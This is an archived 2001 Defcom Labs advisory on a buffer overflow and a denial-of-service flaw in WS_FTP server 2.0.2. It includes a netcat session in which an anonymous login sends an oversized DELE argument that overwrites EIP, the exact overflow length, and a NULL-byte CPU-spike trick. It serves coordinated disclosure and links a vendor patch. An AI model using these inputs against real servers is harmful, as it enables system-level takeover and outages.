======================================================================
Defcom Labs Advisory def-2001-28
WS_FTP server 2.0.2 Buffer Overflow and possible DOS
Author: Andreas Junestam <andreasat_private>
Co-Author: Janne Sarendal <janneat_private>
Release Date: 2001-07-26
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
This buffer overflow gives an attacker the ability to run code on
the target with SYSTEM RIGHTS, due to the fact that the server runs
as a service by default. OBS: This is only valid when logged in as
an anonymous user, not an ordinary one.
The server also contains a easy-to-trigger DOS.
------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.2, havn't tested other versions
----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
All the above mentioned commands seems to be using the same parsing
code which suffers from a buffer overflow. By sending a command with
an argument greater than 478 (474 bytes + new return address) bytes,
a buffer will overflow and the EIP will be overwritten. A
proof-of-concept exploit is attached to the advisory, which works
against WS_FTP server 2.0.2 running on WIN2K (Professional and
Server, any SP).
C:\tools\web>nc -nvv 127.0.0.1 21
(UNKNOWN) [127.0.0.1] 21 (?) open
220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
220-Tue Jun 19 14:00:21 2001
220-30 days remaining on evaluation.
220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
user ftp
331 Password required
pass ftp
230 user logged in
DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
edi=77fca3e0
eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr
na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00010246
* Possible DOS
By sending a couple of NULL(0x0) characters, the WS_FTP Server
will spike at 100% CPU.
---------------------------=[Workaround]=-----------------------------
Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html
-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp.pl
-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 18th of
June, 2001. Patch is released.
======================================================================
This release was brought to you by Defcom Labs
labsat_private www.defcom.com
======================================================================
This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 08:31:41 PDT